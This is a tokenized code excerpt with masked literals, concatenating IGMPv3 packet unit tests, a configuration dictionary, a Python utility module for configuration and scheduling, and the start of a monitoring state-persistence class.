<NUM_LIT:0> ] , IGMP_TYPE_REPORT_V3 ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , len ( records ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmpv3_report . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> def test_json_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_json ( ) <EOL> class Test_igmpv3_report_group ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . type_ = MODE_IS_INCLUDE <EOL> self . aux_len = <NUM_LIT:0> <EOL> self . num = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . srcs = [ ] <EOL> self . aux = None <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_srcs_and_aux ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_init ( self ) : <EOL> eq_ ( self . type_ , self . g . type_ ) <EOL> eq_ ( self . aux_len , self . g . aux_len ) <EOL> eq_ ( self . num , self . g . num ) <EOL> eq_ ( self . address , self . g . address ) <EOL> eq_ ( self . srcs , self . g . srcs ) <EOL> eq_ ( self . aux , self . g . aux ) <EOL> def test_init_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_init ( ) <EOL> def test_init_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_init ( ) <EOL> def test_init_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . type_ , self . type_ ) <EOL> eq_ ( res . aux_len , self . aux_len ) <EOL> eq_ ( res . num , self . num ) <EOL> eq_ ( res . address , self . address ) <EOL> eq_ ( res . srcs , self . srcs ) <EOL> eq_ ( res . aux , self . aux ) <EOL> def test_parser_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_parser ( ) <EOL> def test_parser_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_parser ( ) <EOL> def test_parser_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> def test_serialize_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> def test_serialize_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( aux , ) = unpack_from ( '<STR_LIT>' % ( self . aux_len * <NUM_LIT:4> ) , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( aux , self . aux ) <EOL> def test_serialize_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> ( aux , ) = unpack_from ( '<STR_LIT>' % ( self . aux_len * <NUM_LIT:4> ) , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN + <NUM_LIT:12> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> eq_ ( aux , self . aux ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . type_ ) , <EOL> '<STR_LIT>' : repr ( self . aux_len ) , <EOL> '<STR_LIT>' : repr ( self . num ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) , <EOL> '<STR_LIT>' : repr ( self . srcs ) , <EOL> '<STR_LIT>' : repr ( self . aux ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_report_group . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> def test_to_string_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_to_string ( ) <EOL> def test_to_string_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_to_string ( ) <EOL> def test_to_string_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_to_string ( ) <EOL> def test_len ( self ) : <EOL> eq_ ( len ( self . g ) , <NUM_LIT:8> ) <EOL> def test_len_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT:20> ) <EOL> def test_len_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT:16> ) <EOL> def test_len_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT> ) <EOL> @ raises <EOL> def test_num_larger_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> @ raises <EOL> def test_num_smaller_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> @ raises <EOL> def test_aux_len_larger_than_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> @ raises <EOL> def test_aux_len_smaller_than_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> rep = igmpv3_report_group ( ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> rep = igmpv3_report_group ( srcs = srcs ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , len ( srcs ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> res = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:2> ] ) ) <EOL> aux = b'<STR_LIT>' <EOL> rep = igmpv3_report_group ( aux = aux ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( buf [ igmpv3_report_group . _MIN_LEN : ] , b'<STR_LIT>' ) </s>
<s> </s>
<s> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:U+002C>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:U+002C>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : <NUM_LIT> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:C>' : [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1.0> ] , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> } , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from collections import UserDict <EOL> from contextlib import contextmanager <EOL> from datetime import datetime <EOL> from functools import partial <EOL> from functools import wraps <EOL> import logging <EOL> from logging . config import dictConfig <EOL> from importlib import import_module <EOL> from inspect import signature <EOL> from inspect import getcallargs <EOL> import os <EOL> import sys <EOL> from threading import Thread <EOL> from time import sleep <EOL> from time import time <EOL> import dateutil . parser <EOL> import dateutil . rrule <EOL> from docopt import docopt <EOL> import psutil <EOL> from . import __version__ <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> PALLADIUM_CONFIG_ERROR = """<STR_LIT>""" <EOL> def resolve_dotted_name ( dotted_name ) : <EOL> if '<STR_LIT::>' in dotted_name : <EOL> module , name = dotted_name . split ( '<STR_LIT::>' ) <EOL> else : <EOL> module , name = dotted_name . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> attr = import_module ( module ) <EOL> for name in name . split ( '<STR_LIT:.>' ) : <EOL> attr = getattr ( attr , name ) <EOL> return attr <EOL> def create_component ( specification ) : <EOL> specification = specification . copy ( ) <EOL> factory_dotted_name = specification . pop ( '<STR_LIT>' ) <EOL> factory = resolve_dotted_name ( factory_dotted_name ) <EOL> return factory ( ** specification ) <EOL> class Config ( dict ) : <EOL> """<STR_LIT>""" <EOL> initialized = False <EOL> def __getitem__ ( self , name ) : <EOL> try : <EOL> return super ( Config , self ) . __getitem__ ( name ) <EOL> except KeyError : <EOL> raise KeyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( name , PALLADIUM_CONFIG_ERROR ) ) <EOL> _config = Config ( ) <EOL> def get_config ( ** extra ) : <EOL> if not _config . initialized : <EOL> _config . update ( extra ) <EOL> _config . initialized = True <EOL> fname = os . environ . get ( '<STR_LIT>' ) <EOL> if fname is not None : <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . dirname ( fname ) ) <EOL> with open ( fname ) as f : <EOL> _config . update ( <EOL> eval ( f . read ( ) , { '<STR_LIT>' : os . environ } ) <EOL> ) <EOL> _initialize_config ( _config ) <EOL> return _config <EOL> def initialize_config ( ** extra ) : <EOL> if _config . initialized : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> return get_config ( ** extra ) <EOL> def _initialize_config_recursive ( mapping ) : <EOL> rv = [ ] <EOL> for key , value in tuple ( mapping . items ( ) ) : <EOL> if isinstance ( value , dict ) : <EOL> rv . extend ( _initialize_config_recursive ( value ) ) <EOL> if '<STR_LIT>' in value : <EOL> mapping [ key ] = create_component ( value ) <EOL> rv . append ( mapping [ key ] ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> for i , item in enumerate ( value ) : <EOL> if isinstance ( item , dict ) : <EOL> rv . extend ( _initialize_config_recursive ( item ) ) <EOL> if '<STR_LIT>' in item : <EOL> value [ i ] = create_component ( item ) <EOL> rv . append ( value [ i ] ) <EOL> return rv <EOL> def _initialize_config ( config ) : <EOL> components = [ ] <EOL> if '<STR_LIT>' in config : <EOL> dictConfig ( config [ '<STR_LIT>' ] ) <EOL> else : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> components = _initialize_config_recursive ( config ) <EOL> for component in components : <EOL> if hasattr ( component , '<STR_LIT>' ) : <EOL> component . initialize_component ( config ) <EOL> return config <EOL> def apply_kwargs ( func , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> new_kwargs = { } <EOL> params = signature ( func ) . parameters <EOL> for param_name in params . keys ( ) : <EOL> if param_name in kwargs : <EOL> new_kwargs [ param_name ] = kwargs [ param_name ] <EOL> return func ( ** new_kwargs ) <EOL> def args_from_config ( func ) : <EOL> """<STR_LIT>""" <EOL> func_args = signature ( func ) . parameters <EOL> @ wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> config = get_config ( ) <EOL> for i , argname in enumerate ( func_args ) : <EOL> if len ( args ) > i or argname in kwargs : <EOL> continue <EOL> elif argname in config : <EOL> kwargs [ argname ] = config [ argname ] <EOL> try : <EOL> getcallargs ( func , * args , ** kwargs ) <EOL> except TypeError as exc : <EOL> msg = "<STR_LIT>" . format ( exc . args [ <NUM_LIT:0> ] , PALLADIUM_CONFIG_ERROR ) <EOL> exc . args = ( msg , ) <EOL> raise exc <EOL> return func ( * args , ** kwargs ) <EOL> wrapper . __wrapped__ = func <EOL> return wrapper <EOL> @ contextmanager <EOL> def timer ( log = None , message = None ) : <EOL> if log is not None : <EOL> log ( "<STR_LIT>" . format ( message ) ) <EOL> info = { } <EOL> t0 = time ( ) <EOL> yield info <EOL> info [ '<STR_LIT>' ] = time ( ) - t0 <EOL> if log is not None : <EOL> log ( "<STR_LIT>" . format ( message , info [ '<STR_LIT>' ] ) ) <EOL> @ contextmanager <EOL> def session_scope ( session ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> yield session <EOL> session . commit ( ) <EOL> except : <EOL> session . rollback ( ) <EOL> raise <EOL> finally : <EOL> session . close ( ) <EOL> class ProcessStore ( UserDict ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . mtime = { } <EOL> super ( ProcessStore , self ) . __init__ ( * args , ** kwargs ) <EOL> def __setitem__ ( self , key , item ) : <EOL> super ( ProcessStore , self ) . __setitem__ ( key , item ) <EOL> self . mtime [ key ] = datetime . now ( ) <EOL> def __getitem__ ( self , key ) : <EOL> return super ( ProcessStore , self ) . __getitem__ ( key ) <EOL> def __delitem__ ( self , key ) : <EOL> super ( ProcessStore , self ) . __delitem__ ( key ) <EOL> del self . mtime [ key ] <EOL> process_store = ProcessStore ( ) <EOL> class RruleThread ( Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func , rrule , sleep_between_checks = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> super ( RruleThread , self ) . __init__ ( daemon = True ) <EOL> if isinstance ( rrule , dict ) : <EOL> rrule = self . _rrule_from_dict ( rrule ) <EOL> self . func = func <EOL> self . rrule = rrule <EOL> self . sleep_between_checks = sleep_between_checks <EOL> self . last_execution = datetime . now ( ) <EOL> self . alive = True <EOL> @ classmethod <EOL> def _rrule_from_dict ( cls , rrule ) : <EOL> kwargs = rrule . copy ( ) <EOL> for key , value in rrule . items ( ) : <EOL> if isinstance ( value , str ) and hasattr ( dateutil . rrule , value ) : <EOL> kwargs [ key ] = getattr ( dateutil . rrule , value ) <EOL> dstart = kwargs . get ( '<STR_LIT>' ) <EOL> if isinstance ( dstart , str ) : <EOL> kwargs [ '<STR_LIT>' ] = dateutil . parser . parse ( dstart ) <EOL> return dateutil . rrule . rrule ( ** kwargs ) <EOL> def run ( self ) : <EOL> while self . alive : <EOL> now = datetime . now ( ) <EOL> if not self . rrule . between ( self . last_execution , now ) : <EOL> sleep ( self . sleep_between_checks ) <EOL> continue <EOL> self . last_execution = now <EOL> try : <EOL> self . func ( ) <EOL> except : <EOL> logger . exception ( <EOL> "<STR_LIT>" . format ( self . func . __name__ ) ) <EOL> def memory_usage_psutil ( ) : <EOL> """<STR_LIT>""" <EOL> process = psutil . Process ( os . getpid ( ) ) <EOL> mem = process . memory_info ( ) [ <NUM_LIT:0> ] / float ( <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> mem_vms = process . memory_info ( ) [ <NUM_LIT:1> ] / float ( <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> return mem , mem_vms <EOL> def version_cmd ( argv = sys . argv [ <NUM_LIT:1> : ] ) : <EOL> """<STR_LIT>""" <EOL> docopt ( version_cmd . __doc__ , argv = argv ) <EOL> print ( __version__ ) <EOL> @ args_from_config <EOL> def upgrade ( model_persister , from_version = None , to_version = None ) : <EOL> kwargs = { '<STR_LIT>' : from_version } <EOL> if to_version is not None : <EOL> kwargs [ '<STR_LIT>' ] = to_version <EOL> model_persister . upgrade ( ** kwargs ) <EOL> def upgrade_cmd ( argv = sys . argv [ <NUM_LIT:1> : ] ) : <EOL> """<STR_LIT>""" <EOL> arguments = docopt ( upgrade_cmd . __doc__ , argv = argv ) <EOL> initialize_config ( __mode__ = '<STR_LIT>' ) <EOL> upgrade ( from_version = arguments [ '<STR_LIT>' ] , to_version = arguments [ '<STR_LIT>' ] ) <EOL> class PluggableDecorator : <EOL> def __init__ ( self , decorator_config_name ) : <EOL> self . decorator_config_name = decorator_config_name <EOL> self . wrapped = None <EOL> def __call__ ( self , func ) : <EOL> self . func = func <EOL> def wrapper ( * args , ** kwargs ) : <EOL> if self . wrapped is None : <EOL> func = self . func <EOL> decorators = get_config ( ) . get ( <EOL> self . decorator_config_name , [ ] ) <EOL> self . decorators = [ <EOL> resolve_dotted_name ( dec ) if isinstance ( dec , str ) else dec <EOL> for dec in decorators <EOL> ] <EOL> orig_func = func <EOL> for decorator in self . decorators : <EOL> func = decorator ( func ) <EOL> if self . decorators : <EOL> self . wrapped = wraps ( orig_func ) ( func ) <EOL> else : <EOL> self . wrapped = orig_func <EOL> return self . wrapped ( * args , ** kwargs ) <EOL> return wraps ( func ) ( wrapper ) <EOL> def get_metadata ( error_code = <NUM_LIT:0> , error_message = None , status = '<STR_LIT:OK>' ) : <EOL> metadata = { <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : error_code , <EOL> } <EOL> if error_message is not None : <EOL> metadata [ '<STR_LIT>' ] = error_message <EOL> metadata . update ( get_config ( ) . get ( '<STR_LIT>' , { } ) ) <EOL> return metadata <EOL> def Partial ( func , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( func , str ) : <EOL> func = resolve_dotted_name ( func ) <EOL> return partial ( func , ** kwargs ) </s>
<s> import re <EOL> import os <EOL> from Queue import Queue <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implements <EOL> from twisted . persisted import sob <EOL> from twisted . persisted . sob import Persistent <EOL> from pymon import exceptions <EOL> from pymon import utils <EOL> from pymon . config import cfg <EOL> from pymon . interfaces import IState <EOL> from pymon . utils . logger import log <EOL> from pymon . utils . registry import Registry <EOL> from pymon . workflow . base import Workflow <EOL> from pymon . workflow . service import ServiceState , stateWorkflow <EOL> initialCheckData = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:count>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:data>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class InitialCheckData ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . update ( initialCheckData ) <EOL> class BaseState ( Persistent ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , data = { } ) : <EOL> Persistent . __init__ ( self , self , '<STR_LIT>' ) <EOL> self . data = data <EOL> self . filename = None <EOL> def __getstate__ ( self ) : <EOL> return self . __dict__ <EOL> def set ( self , key , value ) : <EOL> self . data [ key ] = value <EOL> self . __dict__ [ key ] = value <EOL> def get ( self , key ) : <EOL> return self . data [ key ] <EOL> def setFilename ( self , filename ) : <EOL> self . filename = filename <EOL> def getFilename ( self ) : <EOL> return self . filename <EOL> def save ( self , filename = None ) : <EOL> if not filename : <EOL> filename = self . filename <EOL> else : <EOL> self . filename = filename <EOL> def restore ( self ) : <EOL> if not self . filename : <EOL> raise exceptions . StateRestoreError , "<STR_LIT>" <EOL> if os . path . exists ( self . filename ) : <EOL> s = sob . load ( self . filename , '<STR_LIT>' ) <EOL> for key , val in s . __dict__ . items ( ) : <EOL> setattr ( self , key , val ) <EOL> def items ( self ) : <EOL> 